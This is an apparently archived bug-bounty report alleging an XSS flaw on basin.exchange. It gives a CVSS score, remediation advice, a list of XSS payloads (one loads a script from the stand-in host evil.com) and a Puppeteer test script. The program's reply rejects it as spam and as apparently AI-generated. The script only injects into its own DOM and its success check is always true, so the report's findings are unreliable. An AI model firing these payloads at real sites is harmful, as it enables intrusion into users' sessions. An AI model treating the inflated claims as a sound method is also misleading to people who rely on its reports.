Beanstalk Notion
Beanstalk Notion
/
🪲
Bug Reports
/
BIC Notes
/
📄
Report #35905
📄

Report #35905

Report Date
October 12, 2024
Status
Closed
Payout

XSS vulnerability on basin.exchange leads to potential session hijacking and unauthorized actions

‣
Report Info

Report ID

#35905

Report type

Websites and Applications

Has PoC?

Yes

Target

https://basin.exchange

Impacts

  • Injecting code that results in malicious interactions with an already-connected wallet such as modifying transaction arguments or parameters, substituting contract addresses, submitting malicious transactions
  • Persistent content spoofing / text injection issues

Description

Brief/Intro

The website basin.exchange is vulnerable to Cross-Site Scripting (XSS) attacks. XSS is a security vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users.

Vulnerability Details

The vulnerability exists because the website does not properly sanitize user inputs, allowing malicious scripts to be injected and executed in the context of a user's browser session.

To demonstrate this vulnerability, several DOM Injection payloads were used to test for XSS vulnerabilities.

Impact Details

The potential impact of this vulnerability includes the execution of arbitrary scripts in the context of a user's session. This can lead to:

  • Stealing session cookies
  • Redirecting users to malicious websites
  • Defacement of the website

The severity of this vulnerability is high, as it could lead to unauthorized actions on behalf of the user or data theft.

Risk Assessment

Based on CVSS v3, the severity of the XSS vulnerability is assessed as follows:

  • Attack Vector: Network (The vulnerability can be exploited remotely over the internet)
  • Attack Complexity: Low (The attack does not require special conditions and can be easily replicated)
  • Privileges Required: None (No authentication is required to exploit the vulnerability)
  • User Interaction: Required (The attack requires a user to visit the compromised page)
  • Confidentiality Impact: High (The attacker can access sensitive information such as session cookies)
  • Integrity Impact: High (The attacker can modify the content displayed to users)
  • Availability Impact: Low (The attack may not directly impact the availability of the service)

CVSS v3 Score: 7.5 (High)

Recommendations for Remediation

For XSS Vulnerabilities:

  1. Input Validation: Validate all user inputs to ensure they conform to the expected format (e.g., length, allowed characters, etc.). Reject any unexpected input.
  2. Output Encoding: Encode all user inputs before rendering them on the web page to prevent malicious scripts from being executed.
  3. Content Security Policy (CSP): Implement CSP to restrict the sources from which content can be loaded, preventing the execution of injected scripts.
  4. HTTP Headers: Use security headers such as X-XSS-Protection to help protect against reflected XSS attacks.
  5. Regular Security Testing: Conduct regular security audits and automated testing to identify potential XSS vulnerabilities.

References

  • MDN Web Docs - Cross-Site Scripting (XSS): [https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting](https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting)
  • Puppeteer Documentation: [https://pptr.dev](https://pptr.dev)
  • OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

Proof of concept

The following XSS payloads were tested, and the results are shown below:

Tested Pages:

  • https://basin.exchange/
  • https://basin.exchange/build
  • https://basin.exchange/build#/wells
  • https://basin.exchange/build#/swap

XSS Payloads Used:

Testing Script:

BIC Response

We have closed this report and marked it as spam for the following reason:

Extremely low quality: Appears to be AI generated, and the provided POC just manipulates the DOM contents rather than demonstrating an XSS vulnerability.

1. "><img src=x onerror=alert('XSS')>
2. "><svg onload=alert('XSS')>
3. <script>alert('XSS')</script>
4. <iframe src="javascript:alert(1)"></iframe>
5. javascript:/*-->\nalert('XSS')\n/*-->\n
6. '><input value="'';!--"<XSS>=&{()}>
7. "><iframe srcdoc="<script>alert('XSS')</script>"></iframe>
8. <base href="javascript:alert('XSS')">
9. <input type="button" onclick="alert('XSS')" value="Click me!">
10. <script src=//evil.com/xss.js></script>
const puppeteer = require('puppeteer');
const fs = require('fs');
const path = require('path');

// Path to JSON log file for saving results
const logFile = path.join('C:\\Users\\Anton\\Desktop', 'xss_attack_results.json');

// Check if the log file exists, if not, create a new one
if (!fs.existsSync(logFile)) {
  fs.writeFileSync(logFile, JSON.stringify([], null, 2));
}

// Function to log results in JSON log file
function logResult(pageUrl, attackNumber, payload, result) {
  const logEntry = {
    timestamp: new Date().toISOString(),
    url: pageUrl,
    attackNumber,
    payload,
    result,
  };

  const currentLogs = JSON.parse(fs.readFileSync(logFile));
  currentLogs.push(logEntry);
  fs.writeFileSync(logFile, JSON.stringify(currentLogs, null, 2));
}

// Function for delay (similar to page.waitForTimeout)
const delay = ms => new Promise(resolve => setTimeout(resolve, ms));

// Refactored function to handle XSS injections
async function tryXSSInjection(currentPage, payload, pageUrl, id, context) {
  try {
    // Attempt to insert payload through innerHTML
    await currentPage.evaluate((payload) => {
      const div = document.createElement('div');
      div.innerHTML = payload;
      document.body.appendChild(div);
    }, payload);

    // Check if alert was triggered by intercepting alert calls
    const alertTriggered = await currentPage.waitForFunction(() => !!window.alert, { timeout: 5000 }).catch(() => false);
    const resultMessage = alertTriggered ? 'Alert triggered' : 'Injection blocked or failed';
    logResult(pageUrl, id, payload, `${context} - ${resultMessage}`);
    console.log(alertTriggered ? `[SUCCESS] ${context} Attack #${id} succeeded: ${payload}` : `[INFO] ${context} Attack #${id} was blocked: ${payload}`);
  } catch (e) {
    logResult(pageUrl, id, payload, `Error in ${context}: ${e.message}`);
    console.error(`[ERROR] Error during ${context} attack #${id}: ${payload}`, e);
  }
}

(async () => {
  const browser = await puppeteer.launch({ headless: false });
  const page = await browser.newPage();

  // URLs of the pages to test
  const links = new Set([
    'https://basin.exchange/',
    'https://basin.exchange/build',
    'https://basin.exchange/build#/wells',
    'https://basin.exchange/build#/swap'
  ]);

  console.log(`[INFO] Starting Puppeteer...`);

  for (let link of links) {
    try {
      console.log(`[INFO] Navigating to page: ${link}`);
      await page.goto(link, { waitUntil: 'domcontentloaded', timeout: 60000 });

      // Wait for full page rendering (2-second delay)
      await delay(2000);

      console.log(`[INFO] Testing page: ${link}`);

      // List of XSS Payloads with attack numbers
      const xssPayloads = [
        { id: 1, payload: `"><img src=x onerror=alert('XSS')>` },
        { id: 2, payload: `"><svg onload=alert('XSS')>` },
        { id: 3, payload: `<script>alert('XSS')</script>` },
        { id: 4, payload: `<iframe src="javascript:alert(1)"></iframe>` },
        { id: 5, payload: `javascript:/*-->\nalert('XSS')\n/*-->\n` },
        { id: 6, payload: `'><input value="'';!--"<XSS>=&{()}">` },
        { id: 7, payload: `"><iframe srcdoc="<script>alert('XSS')</script>"></iframe>` },
        { id: 8, payload: `<base href="javascript:alert('XSS')">` },
        { id: 9, payload: `<input type="button" onclick="alert('XSS')" value="Click me!">` },
        { id: 10, payload: `<script src=//evil.com/xss.js></script>` }
      ];

      // Test XSS Injection on the current page
      for (let { id, payload } of xssPayloads) {
        await tryXSSInjection(page, payload, link, id, 'DOM Injection');
      }

    } catch (e) {
      console.error(`[ERROR] Error navigating to page: ${link}`, e);
    }
  }

  console.log(`[INFO] Closing browser...`);
  await browser.close();
})();